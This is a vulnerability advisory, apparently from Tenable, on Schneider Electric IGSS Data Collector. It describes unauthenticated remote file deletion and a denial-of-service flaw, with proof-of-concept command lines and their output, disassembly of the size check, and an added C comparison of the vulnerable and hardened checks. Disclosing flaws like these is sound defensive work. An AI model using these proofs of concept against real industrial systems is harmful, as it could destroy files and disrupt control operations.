Synopsis
While researching ICSA-21-285-03 for Nessus plugin coverage, Tenable found multiple vulnerabilities in Schneider Electric IGSS Data Collector (dc.exe) v15.0.0.21301.
Unauthenticated Remote File Deletion
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:L (6.5)
The IGSS Data Collector (dc.exe) does not validate the user-supplied path of the file to be deleted when handling opcode 60. An unauthenticated remote attacker who knows the IGSS project directory can exploit this to delete arbitrary files on the dc.exe host under the security context of the user account running dc.exe.
POC:
python3 igss_dc_opcode_60_file_deletion.py -t <target> -p 12397 -f 'C:\tmp\delete_me.txt' -d 'C:\ProgramData\Schneider Electric\IGSS32\V15.0\GssDemo\'
Using IGSS project directory C:\ProgramData\Schneider Electric\IGSS32\V15.0\GssDemo\
This script attempts to delete C:\tmp\delete_me.txt on the remote target host provided the specified project directory is correct for the remote IGSS.
If the specified project directory is incorrect, file deletion will fail.
Please save a copy of the file and ensure a correct IGSS project directory before continuing the script.
Press c/C to continue or any other key(s) to quit: c
Sending a specially crafted message
Please check if C:\tmp\delete_me.txt has been deleted on the target host
Unauthenticated Remote DoS
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H (5.9)
The IGSS Data Collector (dc.exe) does not properly check the user-supplied size of compressed data when handling opcode 101. The check is a signed integer comparison, so a negative size passes it; later, when that same value is passed to memcpy() as an unsigned length, it is treated as a very large positive integer:
<...snip...>
.text:0047EE69 mov ecx, [eax+1Ch] ; attacker-controlled size
.text:0047EE6C mov [ebp+DataSize], ecx
.text:0047EE72 mov edx, [ebp+var_2D8]
.text:0047EE78 mov eax, [edx]
.text:0047EE7A add eax, [ebp+DataSize]
.text:0047EE80 cmp eax, 7534h
.text:0047EE85 ; signed int comparison
.text:0047EE85 ; 0xffffffff (-1) would pass the size check
.text:0047EE85 jle short ok_47EEF1 ; attacker-controlled size
.text:0047EE85 ; (i.e., 0xffffffff)
<...snip...>
.text:0047EEF1 ok_47EEF1: ; CODE XREF: sn_receive_file+225↑j
.text:0047EEF1 mov edx, [ebp+DataSize] ; attacker-controlled size
.text:0047EEF1 ; (i.e., 0xffffffff)
.text:0047EEF7 push edx ; Size
.text:0047EEF8 mov eax, [ebp+arg_0]
.text:0047EEFB add eax, 20h ; ' '
.text:0047EEFE push eax ; Src
.text:0047EEFF mov ecx, [ebp+var_2D8]
.text:0047EF05 mov edx, [ecx+14h]
.text:0047EF08 mov eax, [ebp+var_2D8]
.text:0047EF0E add edx, [eax]
.text:0047EF10 push edx ; void *
.text:0047EF11 call memcpy
<...snip...>
An unauthenticated remote attacker who knows the IGSS project directory can exploit this to crash dc.exe, which then restarts.
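The size check from the listing, rewritten in C beside a hardened form, as an added example that is not code from the advisory or from Schneider Electric; the buffer struct, the message layout (size field at +0x1C, payload at +0x20, as read from the listing) and the function names are assumptions.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define BUF_LIMIT 0x7534   /* bound the binary compares against (cmp eax, 7534h) */

/* Assumed, simplified receive state: [edx] in the listing is the write offset. */
typedef struct {
    uint8_t data[BUF_LIMIT];
    int32_t offset;
} recv_buf_t;

/* Mirrors the vulnerable check: 32-bit add, then a signed compare (jle). */
bool size_check_vulnerable(int32_t offset, int32_t data_size) {
    int32_t sum = (int32_t)((uint32_t)offset + (uint32_t)data_size);
    return sum <= BUF_LIMIT;           /* -1 passes: 0 + (-1) <= 0x7534 */
}

/* Hardened check: reject negative values first, then compare without wrap-around. */
bool size_check_hardened(int32_t offset, int32_t data_size) {
    if (offset < 0 || offset > BUF_LIMIT || data_size < 0)
        return false;
    return (uint32_t)data_size <= (uint32_t)(BUF_LIMIT - offset);
}

/* Copies one chunk into buf using the hardened check. Assumed message layout:
 * size field at +0x1C, payload at +0x20. Returns bytes copied, or -1 if rejected. */
int32_t append_chunk(recv_buf_t *buf, const uint8_t *msg, size_t msg_len) {
    int32_t data_size;
    if (msg_len < 0x20) return -1;
    memcpy(&data_size, msg + 0x1C, sizeof data_size);
    if (!size_check_hardened(buf->offset, data_size)) return -1;
    if ((size_t)data_size > msg_len - 0x20) return -1;  /* payload must actually be present */
    memcpy(buf->data + buf->offset, msg + 0x20, (size_t)data_size);
    buf->offset += data_size;
    return data_size;
}

/* Builds a constructed 0x28-byte message with the given size field and feeds it
 * to a fresh buffer, so both checks can be compared on the same input. */
int32_t demo_append(int32_t size_field) {
    uint8_t msg[0x28] = {0};
    recv_buf_t buf = {{0}, 0};
    memcpy(msg + 0x1C, &size_field, sizeof size_field);
    return append_chunk(&buf, msg, sizeof msg);
}
```

The vulnerable check accepts a size field of -1 while the hardened check rejects it, which is the difference the fixed build needs to enforce before the value reaches memcpy().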
POC:
python3 igss_dc_opcode_101_dos.py -t <target> -p 12397 -d 'C:\ProgramData\Schneider Electric\IGSS32\V15.0\GssDemo\'
Using IGSS project directory C:\ProgramData\Schneider Electric\IGSS32\V15.0\GssDemo\
Note that if the specified project directory is incorrect
dc.exe will not be terminated.
Sending a specially crafted message
Traceback (most recent call last):
File "/work/0day/igss_dc_opcode_101_dos.py", line 64, in <module>
s.recv(1024)
ConnectionResetError: [Errno 104] Connection reset by peer
Solution
Users are advised to download and install version 15.0.0.21321 of the IGSS DC module, dc.exe, which includes fixes for these vulnerabilities. This version of the module can be downloaded at
https://igss.schneider-electric.com/igss/igssupdates/v150/IGSSUPDATE.ZIP.
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]